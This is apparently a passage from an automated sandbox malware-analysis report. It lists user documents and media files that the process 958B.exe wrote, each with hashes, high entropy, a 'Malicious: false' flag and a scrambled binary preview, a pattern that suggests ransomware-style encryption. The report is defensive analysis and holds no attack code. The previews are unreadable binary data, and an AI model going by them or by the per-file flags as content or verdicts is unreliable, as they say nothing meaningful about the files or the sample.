Preview:	EOWRV...eLq).E..m.M......ko..X5.H.x..-.t.?Q........m....`C....).]k,....g.x..>bq`.s...#.{9..7"W."......:YI.t.S..\...b.N...>]...z.R[b'....}....E....03\|..S.miUh....$.Q.g..L.....q..3~...H...K....-!"..U.3:zTPyg....:.H.{_...u.P..F.-$u.J.m..Y..t..&....+..(....AS..h.8.Q.(d..\|pMVE.?..`;.k.@.xt.....0.z..7..$;W.{. Vfz..}.m..q...Z..(_2.......$....P.@]C..>RhE.....o.{.z..%.K..U./......?...5.....S.7.K...8..Q.....d..@.e..]J.....2r:.j...4.\|N.....>./.PJ.&..\....I.EN@sM^ac.kS...2<.~.......d....9.shx..3.\|%Bo.I.....I<.C....>..2r.\|".....\...K....c.."...5....)\|.......r'.............16F....MV.g...<I"...`..v.t.Y@A....11..0..G>..;...N0..........bw.\]..(.q.........=.....,O.L.....y.zz.............<..B..7%..MZ%.Y..l;..[U...!..g...&......n.^3];..........g.....r..7{..sH....<..a._...1...n....,....I_8.....?..Em..M..Y..t(Q.....:Ze..d-.........8..Gb2n`R...nYKr.?..}..Q...Y.p.4.V.<A`.:H._..9=.S..:.o...h........,.I8.).gJ\f..?zn.....h.K.*!.<.@...@..._....#....9j.b..j....

C:\Users\user\Documents\EWZCVGNOWT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860895900806246
Encrypted:	false
SSDEEP:	24:p7UmPBwtPu6/h03aymOQGgLHqTPA3izveDAJ4M82bWUdNRuScICJkuBk52NuUBMz:/PBYPu6pviu0jec82BNRuScjauBFuRsM
MD5:	9081CE54B20470C56E3798A1DF103C4D
SHA1:	9AD1962F5A7C9D1168B99CBD2577070FD33191B8
SHA-256:	6EE3A8BAEDB4C1FDA6410168EE38FDBCBE45D285520B5045FA773B01964C4F56
SHA-512:	A7CF26AD220E93F4358B272DFFA84BF3B6A876F18228A33BA1715B9BDA784E8773FA9C18562B2D2CC478FE68AEC64703911515C97D0BA61D91AE58F4ED3F0B93
Malicious:	false
Preview:	EWZCVeD..\N....X...w...x3..!Q.9.[...c.....{...rv.4.......C.J..!.%Y9brm.9oPK...8N6.d..7#.....W..%..5\#..0..Z..t....;`#.E......\|......6.-.\.........S...M._x..BKZ...L.pc....D.0C7.&\|I.ZD...sC.afx.U.6\...m.)...P..;.........(.....W.)...^. 0....x.v.B-n..\.....( ..!v`..Um.O...Zl`.X\|.y.}Fl.<L6...f....9..?.6.y.f...~<y..D6_.8Y.+.....8...F..~.(.4vYk..........?B..#...5.PQ<..X.=~.s=o.=..N.@B..%../m.d?....O.%........I+@.Z.%....Vq..N...5....,..4.9...x8\|(....2..$.a........i....0-...z.....A.V6..Mz.1.......-.A.7...r..(T....B..G..]U.$km].....M#....#&..B.&.aN:.\ '.P....Q..n...@A..;K...'.-...R_....,.F.........".\.......n.m.P.+.U-...[..o..J.8..]...@2..p....].1...Pi.I._....&Xw.{%.@.)..&j.w....>,,..#.I-..........*..t.:.x .H....+.C~......nw.7.+.R.j...!.....5.....C......q..t..\...S.+I:.E.d.X.1........#.@..V...LdK\|;.a......\...w5.M..'.g.].a.X.....;...Pm.....&Z.tT.....v..=.Jv..\|..P.i..h.p`[..!...-<..P}.$!....OGso...(.......uf...Y.....:..D77F.t^.k...."U&..x.E.!.Z

C:\Users\user\Documents\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840486529931963
Encrypted:	false
SSDEEP:	24:C9s4wbHBkpBow2ytyjd08MDXbq4k2lulQm9fyL/Jkz4saRplhpFw3nMCKoDPr6tW:ss4wip+ytEzMDXTcl1kIaRpvGMFoDmQz
MD5:	DF2A430BB02F8C310FC908F7C675C685
SHA1:	EBFEF7F03BA4BA5660DB582D56C559774A4C7D96
SHA-256:	7E0A01677E02975BD8A354745F2108B30452CB86008999E0B5711463EFF16716
SHA-512:	9E24782BC6A863CBEAA42D4F1A7BFF6FDD5CFF268F7581E74BC08BBA045C800EE61B1EB573356EFC4C7E0353654461F80FD54CF1C37BDE4B2D02F4E4DC77CFFC
Malicious:	false
Preview:	GIGIY..m....{~...\.....Q.A.z.z..\..].9..(WJ...S]M.@H@X...`&.......>..!...........$..].R...>-WVva....@ ..3..1....jIA...ti......=h...o.Q..%m..m.uE...3.....~.TP.Q@4S..g#0....[D:.m=`x+.....Bb.......L.Y.54........0.....vk./v._y`.'..".9...V...>].xc..&..n.........O....@.ujG....#..n"<k.`.;<l[...7.J.w=xn.E.U..Q.-~.\.R..&3..../z.[l.o.;....;...Y..P]`...^.....Z...C...L.So...@.o..e......{........i.3.D.OU..0.$#3.V./.?..t8.x.......P.@I..c..".p............@.L..q..j.(Gex.............[3QC<....].J.!.S.1.'.b.O\...D<y..7..9G....2.w.....j....i....6_.23....E..1+.:...ML./.5i...V..A.S.%a8{..Q5K&.z..S...Y/....ZV...\|..dG.Y.U.O..}.$.X.y.....A...\|>...w.&....4.;....F.-B....kk.K.....#.a.k........\|.\..f6 k...vcUt..L./=...w.xY1c..k..zw....#jt....R%.4..'......a.. ..D..S.dd.../.H.e...#..>.`.&..\..TT\|....A>Ec.....f..uM.9...#. J...V..'{...e.V;....4.....E>&. P.V........]..d.l.0...(..s..P0.D.}.W..g..g.....h..]$....N[r.1Pt.8.J.k2.{..r...d...[8..#D..\.>.....N...5..5.,..._....h

C:\Users\user\Documents\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8424520334332595
Encrypted:	false
SSDEEP:	24:6Z+QdhYLwMvqIW8I3DNJyVpKqVAoZ0RVejwKi6HFsmbhAMGkNenlR+9jSqbGabD:6Z+82nW8IxwSSxaVeW6WmOkknlg9+qbH
MD5:	D0B12A097260D2986C6BCB798535A1D7
SHA1:	3BB4CA49B83905D8DD8E337FCAD47F441B043288
SHA-256:	ACBAE3E2356D69B0F1F90F8C89255E1EBE38FE6C82CBA81C51ED826A3D49E0AB
SHA-512:	7ED5928421126CA8060A5362EA0528E586559147191836F9D6E3285BCEFCCE3E27DE1ADF7E811CB85712693CB2831EF766A62ECC07D089B1A35DA2F7F0FF95D2
Malicious:	false
Preview:	GRXZD.......-AF6N:.&........&0.Y....3.q..mP..C>.!<Qq=$..BN,R..........,qR....F.L.}...C....b...]/X7X.?Al.{..T.K....yFZ}.(...[o..P.B,.....Au..10u....j..bV....l.&.....>..".bM...O.-=.<r..N\.t..#.Vl.l......Z:.S.s5.%.".."..h.s...nX...3..xV..$3.....z.%7...6l.r2....N..[.....9V..d..oj.z...A.%...(E.nS.\|.\|....0U%._c....6L.8..A..q...y.7.~...L...dl.7RN.9.^.......S#.i.:...N!%.M.'...5K..7......w,m...aW.K...:S.q&;v.+w.....R....2.Z..~e.z.31\"......2.oK0........J.q.&......#.#}ZX.9..-................................._......6.d..Rk..t..=.Y.a.Y..H..G.....L.5....,e^.....8.+..(i.4...........L.[..c..,q.....V.dZ.3(.&..+.=. .".nV./..f\LA..g..^\|oS.6...?.y......Aw..M.".&.C........a..Z.........p.}9..V.L.=\v...._.[Fl.sf\|{.z.6.. .H..b..?9&.:....J..lZ../z.@.v..Yz#...PH.K......7.t...?.ub.yZ..........:(ez(.z..X....a.*..4t..../.3......"\|.}.........0/..$.....Y...R......4......"_..[.9C.27.l.#.....y.kO.......o...p...W\|lq..8".C._.^3>&.$...$`..^...5.m..:.B:..6(..0;..

C:\Users\user\Documents\GRXZDKKVDB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868479500508931
Encrypted:	false
SSDEEP:	24:fsUwr5P7BM7/0yx92Z8BbIX/0iRH1E8T8+tGEKhBapfTEjbL99ItmboVi32pa2bH:f8r5Da3y8s/LRbHGE8I8bIioVvdbrD
MD5:	0FD0EC885B52285E357EC9DB2F21ABA4
SHA1:	29CC0851EAA8FCA281F5F78FE11A39FF4B485803
SHA-256:	52F3D4389C4991E1375EC1A1D2A9A9BB6CF394C28218FF52D1977196A6EC8330
SHA-512:	CBB0F77DF4843A0739C9F2724785A82D02A24929FCBB9332EEAC3EBD2F3274A3EE0A43FFDC29C5BAFC61C903EA62BD26EC7DAB53AFC8B6FDD6A0E2DDB28CFC91
Malicious:	false
Preview:	GRXZDGa...V..pO...Q.:.i...+...C...U....S7..Oc.Q.n..........ye..`...0..l.N.....].u..w.Y.....U$)g...N....bE.d.K>.......<....I...2.gb...S......j....s\.EE..K.7kr .......x..).E.......E;-....z?a........vb`..t.=...U.#.TwY.h..s.@.n...C.Sw.%...Fr..iBIJI.....T...b.7.G.f68P.WN...f..U.....'l...4x....`.......aE..:+..E8...^h..8 .$..6X.....JS..........._w...J.o.(.....&.8..i..3......wM.,...&...cU....a%.j.O......#5..RD.Fxl.uj?.e.4..by./.&.H...7!.<.u=....2p}.x.4.T..gmvQZ....BE...(sW^......n..W..!R2.....M..a.....)x...?OZ}p{F'.R....dM....1}S.....W<Gx........X..Y...A[o.l7.Nv.k1..........^.....z.._o......73....\|M.)..I}.OB..p..q#......H....v....g.g....f..D0...e.zd....r.s;......$.!dp.e.N..`M.s.....d.<..&A....S..~..H..c......l..C.==.,...6K.oq.#.(B\|T..q..."..Q1.W....s.....b...._.V......()u1y.+.'+.0.....Y.fFA>...H.k ...."]......c.....I..U....o.U....P..y.AM.~...O$.E.D..C].\..n(:rD..p..*.X:...XV.:.F..3F......K{.8....OPr..'.H..0Q......R...\\b'[.........

C:\Users\user\Documents\GRXZDKKVDB\EIVQSAOTAQ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8489966330612315
Encrypted:	false
SSDEEP:	24:R4bwLztIt77ZGwNalPeCcRHd5s2XUVMpJkwA67LfKYZBbyWbGabD:0eIt5oACcldummoJNAYjKybrD
MD5:	1FF58DED97ECF23C1F7D8FD91062E387
SHA1:	0E328338097E2B902AD823CF490F59088957A1F9
SHA-256:	5772A5C4C92CDB72C01B48237F38E904F99E020C64E79BEC740BA5420BD92FDB
SHA-512:	FC01CCAB2CCE68AEA1FBECB833AFAC84B8B4CC44397BB646560F32B72A5001341A7351D710ACB47EA3D22D9E9C7F84F4ED58C36CA666A6C76404938EB5F0A341
Malicious:	false
Preview:	EIVQSn?......&.......L.$.V.....KWq...=..,........n.#mO/..\|.w.3X..G.....n.Y.<..........wq..P..<gl.....#...p...` ....E..e(..b....d..&B.MX~.n...#.8..(c......<.k..A.Ey.4..y...X@..p&.2.^...#.. Cg'.N..D....h....F..e}.0....L8)_..V...d...H..&.p.HO.....@;.mm......c......3.]$c7..........M..o.]u..K+pK..S..........j....1.........H!.[.?...;.<.Yv.t..al..8..n.e.J,... .........._.4...[4..og.m....].......e..$..+...BU..M....m..L..H.&..5.k.r....M.Ri>....).....U.......T....y...K[.x.....c&.......@..,..K.#L..I.....)1ppT..Lz+...]..+.(.c.. 6z&8..re..:r..c.... ..E.7C..v....Dbb...n..P.3.Z........gY+...u.J.L..?..]U..7.\|N.8..r....2...<.q..m..Kpb]q.x...0`.?....AgFV/.......U..k....2....e....K.E~:...S...B....hj..?wSM.'...Dy.A\.G.:......P....`O....i.R]S...B]{0.m`.....0..p"=.X=..N.!....A.......w...\%1....d.a..[.~l...T..D.t....vq..E....!....t..2.c.t...).-....M.].b>./.......MN.9.tL.Z..u..*.yD...?..,.O..C.J<.k....JJ...9d._.....5../)..k2.&.CN.......#.\F.O..=..

C:\Users\user\Documents\GRXZDKKVDB\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847588523819608
Encrypted:	false
SSDEEP:	24:lv6VSh3qQS/h45CMxSgHkkTyBm62Ka6cGsQGhDG/3z5UMZ1l6/2gbGabD:l+SQ/hyxbHlWm7KpcGsThA9UOHW2gbrD
MD5:	BE2C5D0580CF283EF1BF1701EC87B1D6
SHA1:	BF009C78FF684D096EA9798D3B0C32966B0BB94D
SHA-256:	3D1C16509AD2089BC118B0450281FB22A0BAD41B90EC9F61B05333274AB5DAAB
SHA-512:	96A1A79495449E1712A82A413432C3AEFF49F5DC13B78A58D3FFC7D1EB54225618DD1E8F156CDFFEFA4A2E22E6B0B9EE7956D503BB02ED0CA02FBF8BE726AE26
Malicious:	false
Preview:	EOWRV..s.d....bm^...2..Q.+.4. 8.......W..%..f.U....j."N.o4..>..8.z,....#.WP.O......~..T^~.J..=.u...].D.Sd.c.D..B..7)Si\)..,@.c$.....1+.H.7...%\|......]l._..6...._!^.T4.kb."...........{.........G<%......10.d.VP..../"l.........-.v....x:]....d.)j.w...0X.jZ.Z.k^...C...j..wB.lQ.O.=.BP..f..&.n.\|.5.......d......k]...Q.0..n.......AC\.l...N2.>.....G.....t..-.k.Z.'.\|......Mv.....VW4..7.}. ....wVT..7...^rH......6\|V..uhv.SCi...=#..N.D.ZR..V.L:xSv.G....gc&z...f.c.l..@[..+...../.4..e.G...0...v...X...GO..k.w~..%.[..B..}J.O(.Q..)...h[=.u[.....a....STw.......\|o.*....0...{...Nf.../.<..EB$.i...!.w[.w.../....../....QI.K.(.......\.&u.P.$.g.X9 .F...V.........%..)..z...^T.....j..t....l.H....\|#R. ...gL.,3B....H.:..i..\.O...`o.K@.-..T..K.".QHjH.........`V.R.x ...2..+0.3....$....o..W,d.....`...v.A..j6..u..&.T...4=...q.W.....7...E.J.eRj`Uq...C.A.[a..-.f...2..hy.U.t-....B;U+.)..............K.N..vK.l.m2.....%/i0%...-.9L<..3X&...N<'.<...".1...........M_.k...!.?..l.t,O.

C:\Users\user\Documents\GRXZDKKVDB\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847268556629302
Encrypted:	false
SSDEEP:	24:CnD7inijmpfJrQMre2SHd7vtAS9rXw8dGi/iIr6+IsuClFKCCz3wObGabD:Iini6ph8MKn971ASJA8IiqI6SRlFKZpz
MD5:	DA44627477529553B005BC08F24C7103
SHA1:	7C017926893728ED0CB1E47FF4229E9DB471C57D
SHA-256:	F64389FFCBB32B2FC06A17868D3EEB98B43602224791A0807CEE1330924FC237
SHA-512:	95EA9E305576EE9F74994BF4CF157EAAC4F41DFD5E05D76AABB6BE3A2FB5615226B4358C00C535203B1A74024E8054A0AB1178258ECF44404B9EA56FD9E4E670
Malicious:	false
Preview:	GIGIY.=..kq.1.....q...K:.....XO`..=.,..0l ........s..Y.1.....t.h.7+:X...T-`>....W..O@....pm...L.:......I...`......q.......'..3.S......y&.....1`E.....4.]....t......+.......>_2.\|M..dDV.$.G....]..rj..J... .L....-..F4v.1f..@.j..Ro>./6...zu..)....V.qj.W}...z...h:..../...s.g.a..Y..._...N..K.0.d..............C.):7@.1..x81hd6s5....0..).X.I.....+.2.3......=.......kl.mP-(s...tdLp....Q<=.." .).l$F[...p.tt.$..)X.Y...G.4pi^...dz..P8Y<$..F.z...C......7..L.......+.L.../.R..bU{\.......x......o.,...s.&0.,.b..\.P\|..E_......<.e.Z*.;........~BW.oZM.2....U.h:.e.....Y.z....q......c6".;...J..D...q..;..U.Nv..M..@^..Rl.h..@.FK:.U.....:fd+.Y..@.v.\.-.]./..c./.y....k.t}[{\|E..B.$J...z.M\V..o.Y;;v......,?.8..]x..7...G^.2S..e...~-...3......]..MdZL.Z.....B......(.i...e.5.t....D......,...`}.n.g...... 0.g.X..J%). .U.......~`.d.9A..H,.. [..._..)(..u..{L....H..9.8.D?...h..plZ..~q........}....H......rn>..\|......K<..=..e..i....7 .J....z.h..ps=.R..[oq;..r...kC...[...O.. ...

C:\Users\user\Documents\GRXZDKKVDB\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855468603841248
Encrypted:	false
SSDEEP:	24:9KApJHqkxPXm9gQGykIFp5zkaP3voMGcu8ddIGkUicAWbGabD:d7qkJXK89A5AaP3voXV8DDDi7WbrD
MD5:	6899D8FE6BB12D873C2957EB2393C299
SHA1:	8E6EC45E66A1A11999B08B44FBBE06EC8820D906
SHA-256:	0345D95F410C5089F45901803AF32EA74526C3B0456E37B18D42264DA4144D97
SHA-512:	9AE7CE8FA5266F4E4F0CD9AE4BFCED78EE7A3202A217D63B653979F92F4E038BF2F8F161890B6F3A9D51ED44379194F9D3AD650E3B82AD4379433AFFBD37E588
Malicious:	false
Preview:	GRXZDX.6...n..#..%.... .9s...>......Od.T.;z.`...2Z........7...@......(w.j......&y...,:..\|"......i...~&.8X..].._/.....J8.M8..Np...:.........\|.Y._^x.!..E'y}......k.i2.IY.,.}...V..<..O{5...,U.#....pl.".".I.,......vD.(8.A{.4=L.i.z..z....Ek@"@....e.M..0.x....\|d.F....9!W..7Y?.YJ...~.3..+.mm.....(....0...]\.......J$..PJ.3....!..M...w $.+c........`..2...o...Q.....FA.F.......<..b..>a...v.L.^...........sy..]N.~...I..a....Z...U._.v....O.U.R".!....IS..2o...X?..bq$%....o_9.i.8.M2.....T44... ..bw<....u......."~%...R....+.....O..X...".!:W.]...x..G...-.MY.\|../........1.]...N.7.kS..Y..c.@."b_....l......."u......._{8.{.wf.w#.....$...i.p.....D...=."../...gA`.<..^..x....F.R..=O.O9..A.^.\|.P.2O..`......N:J.W.......\|&.......,.m4.!a..........j..4.s....rY...........0..m\.xR..<..._.i....h...F..;Nq.[.m..Q.{...{@<K.:T...L..V..t&..v..'.A6.@.i.jd%.aL.w.k......GWCM...U..s(.....=.Z....TO......d..k........!#...{rU..\;.;.....C..&.y'!...[..&..M.mCC.r.U.@..y..n(.6

C:\Users\user\Documents\GRXZDKKVDB\PALRGUCVEH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848261112159127
Encrypted:	false
SSDEEP:	24:5aEnHZY4GSROwdyE4wU1M/G44OdyLSZd/XEyg+Ehq2gWkEkBp4MNSmtWysZk6/bH:5aE2lwdyE+u0Oj/U+EwtWMNSsWFZk6/z
MD5:	D68229EE9D9DFF1497AD89FB4C4C0089
SHA1:	96EC802691C5018B34D882B91140D706CCDF848C
SHA-256:	8C0CB8C5288795B545C2837FF70B09DB78FFF548082C7BD1F6F4FDDAA3E334B5
SHA-512:	863AFA6CEC2E9C512AB1494F5D6AFCADD4D792877E11A3EE348031A9093609F2842FAC38A2228CB6A093FBFD451F896A7941E42E58D4AECDBCE3DE93C7A6CFFB
Malicious:	false
Preview:	PALRG;.$..>a.N.nG.nh.....%.Swz..`.....y)..=aO....+....i.g..;V...h....m.Y..{.v9.>..Z.T.V.t....P.c.g.....X.uc.<...........;./<V&.'.f..{s...l.fD.m.......E.~..[B.[5U.......Sm......r.+y.JE..,...[.?.[R.^...h c.3:.]A....J..`...._..M=h?..7j.).>....!....KV...d.R'y..G'..m.n........[...T<.U..]n.am.8?U.Q"/... .....QH/.....g.n.,..}..wGc..D@....u....S.U..4..T....8...H...?N%.I.p...+.}.["..:.)......Vt..d.O@.Y.....^EA".e...L~.9YS.R.%.U..r.).. .P..J.;....L.. .U.8......v..g."...}.`..'..Z..._...}..)...5S._>.`...z..FH0..,.5....z....=.n..H...Li`=n..!...#....a-...E.h..R...."..<.. ..kK.6.#.Ti]j.?...R..cM..B..8.....-.Bv .zr.e.....%........lh3d.Xz.......I.@...m.~.(..((..g..>$....l...6....#..w.%&l.....K<n ~9..~.w.2....O......`..:.T..,h.......ey..P8..eX...t.L..&..c7cOh...\....i...f....>A..1..e1^..o&....... .:.ec=..t6...C.J.bY....+G...........L.......".qH..Z...c.TN.Y.m.......~..h.....4..5......,.L3...ww.T3....].....w}....l.7#.S.....4`>...Iy.....v..3.....Z.mp..:..%

C:\Users\user\Documents\GRXZDKKVDB\TQDFJHPUIU.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8432588915136305
Encrypted:	false
SSDEEP:	24:YGv5S5Kcrs9xLRufX8QfhLToi6tsGHZ1pyyhctIEoKJo/bGabD:1SNmc7hLToiMsGHoJtICJo/brD
MD5:	B0A9259B03DCB63DBAEED24DA10A7798
SHA1:	4AE2B991BACA64E0532820FDEB393C1067FFA3B1
SHA-256:	7B37735DAD67CFD7C9BC2954255A4A82ACB3ADE6CD10E23A980C829B329F5107
SHA-512:	A335AEA811CCC857AEA27F04E32A036F3A6E9470C3C87BED27BB2B5D6A2815ADD327F59CF574AC55AE1DFEB46195B432DCBDE6F919A93A97A284E422E90BF6DE
Malicious:	false
Preview:	TQDFJ.?Xh.. ..E.<n5l.o.X9V..+......$M..J.Y..w..5...R..H..&..I..]~.P...."?y./l.j%...B..T.~.BH.Xl6x...;~O8s.....jQ .K..t.o-..d..9...7.....}...\O.F..#d.Z..v..>.z.%.............E..U...P..ki....y..........J..0..d.Y..?<..`V.Z..I..){Dm..U.[.kv[+@f.0z......X.e.._...m.b.C._h!o.t,..(..ei.1q.O....k.S..x....(...(.....AknYr.FiZ9.."."..#5.bU......,.. }...i....Y...0u.....O...}.cY.$-...r.EQ{#..s...Vy.ox]c7....y...XGD.M.K...<?..9.>..`....Mz@x..=...TW....l..n[}..I.......I....;..B.IK.B..........1..J.........F.c.g..S....c.$B.F..E..P6.dI.$.....0.+...0...6....)N..R.f.Y:Il.ka.....qKrx...A..w.2.^q#....t....t2b/...[1........rD."7W......_....OMG.o....F>Vv..S9..v]U,..7.u.e.k.(.u=...eb...........~d1.WbbO%n.....p.M.Y..r....v`.h..OgM.}......d....._..F0..>D.V....).Q#j6.D..:..h>.uG;....sU.D..G..E..^f.(...w..C........`.A..@.D.x..Q....@95O...<.........p1..y.l......7...<........D.O..7.+....h.2...HU..)6H...#..g..D......b..m....H......#.mDM..^...C...\|.......3...;..^..X.......q.....G...

C:\Users\user\Documents\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858283851635174
Encrypted:	false
SSDEEP:	24:zXDiSH1GUsRBeAy7ttzyq3zAeUty4QxBprc8QvciYlA+E1DaMOlNIu6YgVMAbGaX:zTCeAyBtzrDAGF4YiYa+ERaFNTonbrD
MD5:	03B7DEBE440E459D9FD07D257BC0162D
SHA1:	3E63810FA0AFC7F590C2DF71AECE04CBDECC4FB5
SHA-256:	612426145E2496EC07DC3D64D65F708AA64A21545E3B9705EFB42701003F3167
SHA-512:	2C6B07D9BDACD3CF34067F0FEFE73247CAABC728360F7C037B85431DFE1B5B72336567CCB20005D7E0CAA2C93D5E1E5C99FF8481A8814A0FCC551FF0AE19F3D6
Malicious:	false
Preview:	NYMMP+.k..Z.8.%u..CK.{.j...c........a..'..\.U7}.b..N..8.\|?...f.....A.....s.......f="V.T"2...o.E9.`A5:..B]......7.`.gl..x...'...Z.B.y....qjO.7.M.G..m.[vh.....e!......"..R.rg...9..k.....u...fSa.c.......L....j...[...x.....;[.n...W.A...=-^y..9.Cx.D....,..3...3...!..$.GI&s..0......]M....:.?.Rk..Y./.3;....(..a..N-.(.6...>....d.c+.....0.a..<.F.\.)..4.&.Y.:..\|%W...5....iI.>..'N;..v^.y..G..EF...]i..Fd&..2.\|t.&....+...]..Y..!Ut.aq......&vb.....RU....c..,....\|.X.u...F..o..6.}..o2CdG.,.i....69.s.<d....D\|H:...P.i.w......UU#..:....".B=...d6.....x.O..,>i.J...u;\r`Y..-.@..o`)ok...FH....m...=.X..l...%h5..:%...(...~...,..u...xo\|.Xf+A..k.g.0Ah.%.....k...q,...t..~..m...lv..@kc..>n.b......<.gU.~I..T..L.fv....2c#.a.M.y..bn...H...H2.v...u........on.0....\..6w$7X.k......./..>I...b................7.s.%....G5..0.wE.N.9-.fJ..#._...6..>....A[..Z..Z....z..d"...../..v\!I........cZJu..RqN^....k.`...(..C.=.....%......4....mI.&.x2....h.>.7jU....ch.1.e.pEUjF.....@\|....

C:\Users\user\Documents\PALRGUCVEH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.825705095069599
Encrypted:	false
SSDEEP:	24:5FQUTeAObReZkw2xRK1RCOrGUC09ZGlos+ONskA8852yGlHkynQ/21bGabD:QGObcZp2xElCUD3ElLA8851GlEynq21z
MD5:	35C99F7ACBA9DA3D0E382A97FEAD2D79
SHA1:	236A5AB61F7DE1CDFF71A5580C1EB67B01C3AC27
SHA-256:	8418FF61ABDFA665F857511D233DE23696CAE0EC7BABFB4CF5ED0342DD53AAD0
SHA-512:	EC222E8ABA38EF9005750A78645BA66CE4B78E3E2ECDC8C80296BD42B873BA3B037F840CF9405240D9E748124A08001FBA4000D92A489DDD73E64AD4DC82FCC8
Malicious:	false
Preview:	PALRG....0....\|.\|......G(.y.Z.^=.f.L.G}/....f...{......I.....~U.pc[....6-.9.....&........+.E.;....H'. .6.0#..>_F;..m..s.....H..<..PU..Hx..z.1........).V.D...._/Z..Q.4......'.XE..\)....(...a..1q....{e......sg......0.....V..Y...Z...oH....p.,.v.x.4.s]e.3.My.qdVU....nq)9.0..@XV`...Z.?+.r~.#..&L8..p.fTx.F...O.X6R.[....l..5N..&.Z7.7....l..q..&.N....N...Bg.t..q.x.WO...z.......8I(,.2.[..\|2.O.Cu........Qa..}8rT..q:..[J.~.f....2b?cG.n....p0.L3+$....x.j.....\[.7.?...-7.t...'..b..).....3{.....C..W.j.oX.I.X. .a=.F;..F...'...a..;.....$+.^\|..gA..0....w..C0..H.;.mjS..$&.w..i?.O(.5..#..Da-....]....s...k&}b..7]....X.W.p...w.3...C.5.>ni.v....8.(.r....:..#K..W.MZ.\...)....`.@.k..Y..G.....}..R)_.k......p.2m...00b....`..4@Q.~Y..@...VixRD.`.i.7..Y-..e.[..bj.?Ev....BCg0o.JN......5_.:..w.A;@....h.....k>.J....2..6P..y@....M.<D..^."...8lj..q..n.N\..\.9..3..9..O...A.E;s.....L59..t.]8....c.(.f.tUzp=..4./..P...I....,...j``ySt....&...6.pxb...RiW.{.\|.

C:\Users\user\Documents\PALRGUCVEH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841563829878928
Encrypted:	false
SSDEEP:	24:cdldYjfkI/aPZleKr/cTLY9tmDMhBIuDTzunJzQukAZQDQnEHHKJD9HwjfHNqelN:cbdYQIieKwT896MwuDuqrAZQUEHHUWfD
MD5:	3B8B1DBF2CACFC45697169246251AB55
SHA1:	AA71681D1C3B60DDE467316825E9E36EE87B37D6
SHA-256:	97EC705D734B6CB04A2156BDA20F8F180FB8E4314E6097492FA005CE6F844917
SHA-512:	05B2012EC2D2F93A7CDFC1E2F0F45C2D336D9DE3D225C302C902E1945281534C8DE4B6C4644C885BDB770B4D96E17F6BC3530988B9CEFEC1EE8A9E1B8CF81250
Malicious:	false
Preview:	PALRGN.U...)..~..a2..N..3.4.~...~.V.d.A3!#A..X5=.?22{k..q.rNP.;.to.......A..v..bE.T.. ...3..^...e%.-..DE!........0.r.).vr.".?...Z.....e....x...R..{.R..v.\|..E.........y,luy..% 6.(_..B....h..R.q..\....W..X.S.9..#..G.PF......7.e.....?..c^..<................?........N]..t.\|..:..0......[....i.......J..T.G.........[mr.s...E..I......PSd=.eR.N.%..s.#.3.J..'..s.y....3....^......;...Zct...l....@.........R..G5......@.k...7."...f[l./bp........o..W.5....-..~..R.nW...g.zK..@p..]`..f..Zb .7....._...eAT?<..F-g......j..G....k....]s.S..!\....u^.u....Q.RcE.I,...6...L...VW...Xv...s....H.......fq...,.ci-....M.a{.W..6L....M...$.x.,......5D..E..5..{.~B.H.t..>...=MgG...L..z...i...!.Z...o...$=...pb....U...?.+....;....L....-......I....n>:.~..g...A..fXA...f+..s)X.ZZ.f..lP--.....7.y..p..Eg.g...%.Wp..2..G.H...!.o..R[.g.....#i....b&.].\|..G..D>.#.b....o.!3&.3Rp..u..jaM....c0...T1....^...2....B.....em..,fP....#cO..l..cyD...x.....:QK)4.....P6.m..... ..k......;.[.....

C:\Users\user\Documents\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843884859875385
Encrypted:	false
SSDEEP:	24:zs6orXkHWuk8XfyrLRozBSnSLmg87OwV1BgDJEy/pidTmCyyQcjBNi9MZBl4W0bH:IZXkHe86pKBgSntxOEpFVfoBISBOW0bH
MD5:	2259149715B938B22D1CA32BEB6408BB
SHA1:	25582DB8B18C1E3841DD2ACD2445EF5CFC626DC5
SHA-256:	B45FDF545EAFFF052259B3DC4DA05856EAFE24783E17264DA3F98D564EC04B3B
SHA-512:	F686E643C906F5145434B4F1E9461A8B7287892FBB763E3C11DD61ABB57CA71E41942DC5A67A1C35D5C1C213C6E3B9FC9FAA993A5CFA0F3EA7189B715C96AEC6
Malicious:	false
